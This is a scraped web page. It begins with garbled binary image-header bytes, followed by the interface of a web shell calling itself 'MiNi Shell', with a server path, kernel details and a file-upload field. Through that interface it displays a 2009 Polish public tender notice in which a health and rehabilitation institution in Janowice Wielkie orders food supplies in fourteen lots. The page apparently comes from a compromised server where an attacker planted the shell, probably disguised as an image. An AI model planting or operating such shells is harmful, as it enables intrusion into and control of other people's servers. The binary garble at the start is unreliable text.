JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090416/108148-N-2009.html

<p class="kh_header"><b>Janowice Wielkie: Dopstawa artykułów żywnościowych</b><br>
<b>Numer ogłoszenia: 108148 - 2009; data zamieszczenia: 16.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Profilaktyki i Rehabilitacji w Janowicach Wielkich - SP ZOZ , ul. Karola Świerczewskiego 12, 58-520 Janowice Wielkie, woj. dolnośląskie, tel. 0-75 7547500, faks 0-75 7547503.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zpir.sisco.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dopstawa artykułów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 15 110000-2 mięso; 15 112130-6 kurczęta; 15 113000-3 wieprzowina; 
                                             15 114000-0 podroby; 15 131131-2 wędliny; 15 131310-1 pasztety; 
                  15 222000-0 filety rybne mrożone; 15 412000-tłuszcze ;   
                                             15 511700-0 mleko w proszku; 15 512100-1 śmietana chuda;
                                             15 540000-5 produkty serowarskie; 15 613300-1 produkty zbożowe;     
                                             15 831000-2 cukier; 15 851000-8 produkty mączne;15 863000herbata; 
                                             15 871000-4 przyprawy; 15 981000-8 woda mineralna; 
                                              
                                              Przedmiotem zamówienia jest dostawa artykułów żywnościowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.61.25.00-6, 15.11.00.00-2, 15.13.11.31-2, 15.30.00.00-1, 15.82.00.00-2, 01.24.20.00-5, 11.33.14.00-1, 15.33.22.90-3, 15.41.20.00-9, 15.51.17.00-0, 15.51.21.00-1, 15.54.00.00-5, 15.61.33.00-1, 15.83.10.00-2, 15.86.30.00-5, 15.86.10.00-1, 15.98.10.00-8, 15.87.10.00-4, 15.33.24.10-1, 15.22.20.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zgodnie z art. 22 ust 1 ustawy o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
 1 posiadają uprawnienia do wykonywania określonej działalności lub czynności,      
    jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień;
 2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  
    technicznym i osobami  zdolnymi do wykonania zamówienia;
 3 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
   zamówienia;
 4 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.Ocena spełniania warunków wymaganych od dostawców zostanie dokonana na
podstawie analizy Oferta spełniająca warunki otrzyma ocenę spełnia, natomiast oferta nie spełniająca warunków otrzyma ocenę nie spełnia.
3.Dostawców, którzy nie spełniają warunków udziału w postępowaniu, o których    
   mowa  w art.22  ust. 1, zamawiający wykluczy z postępowania o udzielenie    
   zamówienia.
 4.Katalog   zamknięty   przesłanek   stanowiących    podstawę  wykluczenia         
    wykonawcy   z    postępowania określa art. 24 ust. 1 i 2 ustawy.
5.Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
6. Zamawiający   zawiadomi    równocześnie   dostawców,    którzy   zostali
wykluczeni    z   postępowania   o   udzielenie  zamówienia,   podając   uzasadnienie  faktyczne   i   prawne  z  zastrzeżeniem art. 92 ust. 1 pkt 3 ustawy. 7. Dostawcy mogą wspólnie ubiegać się o udzielenie zamówienia (art. 23 ustawy).
   W przypadku dostawców wspólnie ubiegających się o udzielenie zamówienia   
   warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1 i 4   
   ustawy muszą być spełnione przez każdego z tych wykonawców, natomiast    
   warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 2 i 3  
   ustawy  mogą być spełnione łącznie przez wszystkich dostawców wspólnie   
   ubiegających się o udzielenie zamówienia.
8. W przypadku wspólnego ubiegania się o udzielenie zamówienia, dostawcy ustanawiają   pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do  reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy   dotyczące   dostawcy   stosuje   się   odpowiednio   do   dostawców   wspólnie  ubiegających się o udzielenie zamówienia.
Jeżeli oferta dostawców wspólnie ubiegających się o udzielenie zamówienia, zostanie  wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia, umowy  regulującej współpracę tych dostawców.
Dostawcy   wspólnie   ubiegający   się   o   udzielenie   zamówienia   ponoszą   solidarną  odpowiedzialność za wykonanie umowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu o udzielenia   zamówienia publicznego wymienionych w punkcie V.1 SIWZ, stosownie do postanowień art. 25 ust. 1 i art. 44 ustawy oraz rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane Dz. U. nr 87, poz.605, zwanego dalej rozporządzeniem wykonawca musi złożyć niżej wymienione oświadczenia i dokumenty:
 1.oświadczenie o spełnieniu warunków udziału w postępowaniu -  wg wzoru          stanowiącego załącznik nr 2 do SIWZ, podpisane przez osobę upoważnioną do      występowania w imieniu wykonawcy. Brak podpisu osoby upoważnionej oznacza nieważność oświadczenia;
 2. . w celu potwierdzenia, że dostawca posiada uprawnienie do wykonywania określone działalności lub czynności oraz nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy, zamawiający żąda złożenia:

     1aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o    
        wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy   
        wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności   
        gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem      
        terminu składania ofert;
        2 aktualnego     zaświadczenia     właściwego     naczelnika     urzędu      
        skarbowego  potwierdzającego odpowiednio, że wykonawca nie zalega z 
        opłacaniem podatków i   opłat lub zaświadczenia, że uzyskał przewidziane    
        prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub  
        wstrzymanie w całości wykonania decyzji właściwego organu -   
        wystawionego   nie wcześniej niż 3 miesiące przed ,upływem terminu   
        składania ofert;
        3aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń   
        Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego   
        potwierdzającego  odpowiednio, że wykonawca nie zalega z opłacaniem   
        składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że     
        uzyskał przewidziane prawem zwolnienie, odroczenie lub rozło8enie na raty  
        zaległych płatności lub wstrzymanie w całości wykonania decyzji          
        właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed 
        upływem terminu składania ofert.

 4.Dostawca zobowiązany jest złożyć ofertę -wg wzoru stanowiącego załącznik   
    nr 3 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> zpir.sisco.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Profilaktyki i Rehabilitacji w Janowicach Wielkich- SP ZOZ 
ul.Świerczewskiego 12
58-520 Janowice Wielkie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2009 godzina 10:00, miejsce: w siedzibie Zamawiającego tj. Zespół Profilaktyki i Rehabilitacji w Janowicach Wielkich- SP ZOZ , ul.Świerczewskiego 12, 58-520 Janowice Wielkie  - sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo - wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Chleb Baltonowski  - 600 kg
2Chleb Gracham       - 500 kg
3. Bułka zwykła mała - 1000 szt
4.Bułka słodka         -   500 szt
5.Bułka tarta          - 280 kg
6. Kawiarka            -   30 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso,produkty mięsne,wędliny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurczaki -1400kg,karczek z/k -1300kg,mięso mielone-770kg,schab z/k -30 kg, kiełbasa rożnowa - 620 kg, kiełbasa szynkowa- 280kg, kiełbasa Martadela-240kg, kiełbasa żywiecka-240kg,kiełbasa biała - 20 kg,kiełbasa toruńska- 10kg, pieczeń rzymska-240kg,szynka wieprzowa -30 kg,parówki -600kg,pasztwtowa -340kg, salseson kg,340,kaszanka-240kg,watróbka-620kg,pasztet z drobiu- 300kg,słonina -400kg,boczek -20kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.31-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa, owoce i ziemniaki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> buraki czerwone - 1600kg ,cebula- 400kg,marchew-2100kg,pietruszka ko9rzeń-20kg,seler-korzeń -20kg, kapusta -960kg,kapusta czerwona -570kg,kapusta pekińska -50kg,pory-20kg,fasola-380kg,groch ziarno-53kg,ogórki świeże,zielone - 500kg,pomidory-300kg,pietruszka zielona-450p.,sałata-1000 szt.koper zielony-500p., szczypiorek-450p., rzodkiewka-600p, jabłka-400kg,banany - 100kg,pomarańcze-50kg,kapusta kiszona-720 kg,ogórki kiszone-820kg,ziemniaki-19000kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.31.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wyroby piekarskie o przedłużonej trwałości.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> suchary zwykłe - 8kg,herbatniki -50 szt,wafle-100szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.82.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Jajka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jajka - 20000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.24.20.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dżemy,warzywa przetworzone i konserwowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dżem wysokosłodzony - 150kg,dżem nisko9słodzony -100kg,kompot-750kg,ketchup-330kg,koncentrat pomidorowy-110kg,ogórek konserwowy -500kg,groszek konserwowy  - 100kg,kukurydza konserwowa -100 kg,chrzan tarty -300kg,olej rzepakowy -600l,ocet-50l,sałata szwedzka-20kg,sałatka babuni-20kg..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.00-1, 15.33.22.90-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Produkty mleczarski i margaryna.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mleko w proszku -430kg,śmietana -500l,masło 900kg,jogurt-1000szt,ser topiony -330kg,ser twardy-480kg,ser biały -380kg,serki smakowe-100szt.,margaryna -100kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.20.00-9, 15.51.17.00-0, 15.51.21.00-1, 15.54.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Produkty zbożowe i odżywki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka pszenna - 1000kg,kasza jęczmienna-500kg,kasza manna-250kg, ryż-620kg,płatki kukurydziane -250 kg,płatki owsiane górskie-250 kg,makarony- 650 kg
makaron zacierka-50 kg,kleik ryzowy -5kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.33.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Cukier.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier-1500kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Herbata,kawa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> herbata - 37kg, kawa zbożowa -10kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.30.00-5, 15.86.10.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Woda mineralna.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda mineralna niegazowana 1,5l - 600szt, woda mineralna gazowana 1,5l - 600szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Przyprawy kuchenne,warzywa suszone.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pietruszka zielona sucha-4kg,kopereksuchy-4kg,szczypiorek suchy-1kg,czosnek granulowany- 2kg,musztarda -240kg,majeranek-2kg,przyprawa do zup w płynie - 8kg, papryka mielona słodka- 2kg, pieprz naturalny mielony -8kg, pieprz ziołowy -8kg,sól kuchenna - 400kg,liść laurowy-4 kg,ziele angielskie -3,6 kg,jarzynka - 80 kg,kwasek cytrynowy 320 szt,majonez -50kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.10.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Owoce suszone.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzynki-2kg,śliwki suszone-1kg,mieszanka owocowa -1kg,mak-4kg,grzyby suszone-5kg,mieszanka bakaliowa-1kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.10-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Ryby i przetwory rybne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ryba mrożona - 50kg,śledź- 20 kg, paprykarz szczeciński - 20 kg, ryba wędzona -40 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.20.00-0, 15.24.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com